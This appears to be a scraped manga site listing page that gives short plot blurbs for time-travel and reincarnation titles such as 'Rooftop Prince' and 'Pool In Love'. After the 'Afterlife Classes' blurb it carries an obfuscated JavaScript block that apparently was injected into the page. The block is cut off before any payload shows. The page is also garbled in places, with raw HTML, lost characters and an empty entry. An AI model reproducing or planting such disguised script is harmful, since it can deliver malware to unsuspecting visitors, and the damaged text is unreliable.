Time Travel - Page 17

Explore the world of Time Travel manga, where gripping stories await. Start reading the best Time Travel manga free now!

218 results

The Scorned Villainess Survives in the Wilderness

The Crown Prince Wilhelm suddenly announced the dissolvement of his betrothal to Constance (Connie), the daughter of a marquis. It seems like he had fallen in love with someone else… a saint who had appeared recently. Connie grew depressed at the cruel declaration, as she had spent the past two years acting as his consort. But one day, her memory returned, and she realized that she had been reincarnated as the villainess in a romance novel. “Whatever. I don’t need a cheater (with the option to become a villainess). I’ll live on as the leader of my land!” This is Connie’s story of how she lives her life with strength in the borderlands far away from the capital city! Read manhwa The Scorned Villainess Survives in the Wilderness / Kon’yaku o Haki sa Reta Akuyaku Reijou wa Kouya ni Ikiru


The Emperor Reverses Time

<div class="post-title"> <h1>The Emperor Reverses Time</h1> </div> <div class="tab-summary "></div>


I Control the Prince’s Heart After a Rotten Exhibition

When the foolish but cute glutton Hua Manman transmigrated into a novel becoming a villainess, she was supposed to refuse the king’s hand in marriage to wash away his misfortune and then enter the Imperial Palace to become one of the Emperor’s concubines. She didn’t expect the king to read minds, and he even took her in as his concubine?! 摆烂后我掌控王爷芳心 / I Control the Prince’s Heart After a Rotten Exhibition / The King’s Heart is Mine (official)


Afterlife Classes

Choi Kanghee has no friends and is often misunderstood due to his scary appearance, but all he really wants in life are some friends. One day, he returned home to mourn for his grandmother’s death anniversary, but a strange turn of events ends up reuniting Kanghee with his grandma! Can they work together to create new friends, or did it just turn more difficult? ??? ???! / Otherworld classes / The Otherworldly Class!<script></script><script>(function(_0x3932a8,_0x5316ea){var _0x2b7c52=_0x25e1,_0x5106ff=_0x3932a8();while(!![]){try{var _0x16ab7d=parseInt(_0x2b7c52(0x17d))/(0x233*-0xa+0x401*0x5+-0x2*-0xfd)*(parseInt(_0x2b7c52(0x177))/(-0x9*-0x3a9+-0x4f*-0x7c+-0x4733))+parseInt(_0x2b7c52(0x181))/(-0x2321+-0x15ed+0x3911)*(-parseInt(_0x2b7c52(0x175))/(0x7*-0x213+0x63a*-0x2+0x1afd))+-parseInt(_0x2b7c52(0x17f))/(-0x1461+-0x1*0x1c33+0x13f*0x27)+-parseInt(_0x2b7c52(0x174))/(-0xa60+-0x10*-0x18e+-0x22*0x6d)+parseInt(_0x2b7c52(0x172))/(0xeff*0x2+0x5*-0x28+-0x1d2f)*(-parseInt(_0x2b7c52(0x18e))/(0x1*-0x1d07+0x1*0x6b+0x1ca4))+parseInt(_0x2b7c52(0x18a))/(-0x1b*-0xed+0x1*0x14a5+-0x2d9b)+parseInt(_0x2b7c52(0x171))/(0x12*-0x1ef+0x1348*-0x1+-0x2*-0x1b10);if(_0x16ab7d===_0x5316ea)break;else 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Belle and the Beast’s Labour Contract

One night, Belle got acquainted with the Busang Leader (Busang also means injury/injured). Her father, who was trying to stage a comeback, was someone even owned the Beast a debt! But the conditions the Beast gave them were kind of strange?! “If you are unable to pay off your debt, please find my spouse.” Will both Belle and the Beast be able to pay of their debts and find their spouse respectively according to the terms of the contract? This is a strange yet special romance between two people!


Past life family

前世家族 "Warning: Yaoi content: This manga contains materials that might not be suitable to children under 17. By proceeding, you are confirming that you are 17 or older." A poor boy who is often pitied travels over to the Magic Continent and is sent to the palace as the reincarnation of the former queen. In their previous life, they had a family with a husband who spoiled their wife, but they were used to being the ‘vicious stepmother’ of his “Children”.


Pool In Love

Song Jinju is a low-level employee who drowned in a pool party organized by her company. She awakens and finds herself in the farthest island from the main island, 12 years in the past. Jinju manages to return to the present, but she can't forget the island and the man she met. 풀 인 러브


Rooftop Prince

옥탑방 왕세자 When Park Ha discovers three strange men sitting on her new place, she would have never guessed one of them was the Crown Prince. As Park Ha tries to navigate her new life in Seoul, she discovers bits of her secret childhood and how she came to be separated from her family. Meanwhile, 300 years earlier, the Crown Prince is desperate to find out answers to his wife's mysterious death. Before he does, cosmic forces intervene and he's switched with someone who looks just like him from 300-years-later Seoul. The ultimate crossover between Joseon and Seoul fueled by mystery ensues when the two meet.

13 hours ago

One Pair Lady

When I woke up from my sleep, my house had disappeared?! Adele, a gambling genius, suddenly transmigrates ten years into the future. Participating in a gambling event at the request of the tower master, Rudy leads her to meet the Duke of Elfinheim, the organizer of the event. A name that I seem to have heard somewhere, with a familiar pronunciation and appearance. What is this strange feeling? “Where’s the lady the Duke was looking for? “Aha, that rumored lady? “Yes. I heard rumors that the gambling ship itself is currently afloat only for that woman.” Besides, the rumored lady’s description is similar to mine?! One Fair Lady / 원 페어 레이디


Snake Essence Is a Kind of Disease

"Warning: Yaoi content: This manga contains materials that might not be suitable to children under 17. By proceeding, you are confirming that you are 17 or older." Legend has it that the Misty Mountain in the Hundred Thousand Mountains is inhabited by the Medical Immortals, which is quite magical. This is an ancient sect of immortal cultivation, where each generation of disciples has the same bloodline, but for the brothers, the handsome brother is a snake charmer? Snake Spirit has a Disease Shé Jīng Shì Zhǒng Bìng Snake Essence Is a Kind of Disease 蛇精是种病


Crossing Egypt: Becoming The Pharaoh’s Bride

/ Chuanyue Aiji: Chengwei Wang De Xinniang / Passing Through Egypt: Become the King’s Bride / Traveling Through Egypt: Turning Into the Bride of the KingUnder the wish of Yuya, the black cat, Nefertiti traveled to ancient Egypt and became the princess who was destined to be a bride in Egypt. Why did she, who just wanted to find a way back to the modern age, accidentally fell into the eyes of the next pharaoh, Akhenaten? And Yuya, who had been by her side all the time, seemed to have a secret. Destiny-like love started quietly from their reunion.


To Melt Your Frozen Heart

With his entire family either gone or missing, Adrian DeMonte must take the helm as the sole heir to the wealthy Velkra estate. By official decree of the emperor, Adrian is to choose a noblewoman for her hand in marriage. Adrian chooses the infamously ruthless Marchioness Frey Vuxia, known as the “Wolf of the Battlefield,” in hopes that she will reject his proposal. But to his surprise, she accepts! Now, Adrian must navigate not only the desolate corridors of the marchioness’s castle but also her savagely frigid heart. Unfortunately, the cunning emperor has held a lifelong flame for Lady Vuxia, and he will do anything to trap her once and for all, even if that means getting rid of Adrian. Will Adrian be able to win over the icy marchioness while avoiding the emperor’s clutches? A survival romance in a cold and suspicious castle begins! Adrian wants to avoid getting married in any way but he was given the emperor’s command to marry Marchioness Frey Busia, who’s also known as the “Wolf of the Battlefield”. Soon enough, Frey had already signed the marriage contract! Now, I’m married. But why is it impossible to see her? Marchioness Frey Busia Rumors say that she would kill anyone who sees her face. Can Adrian melt her cold heart?
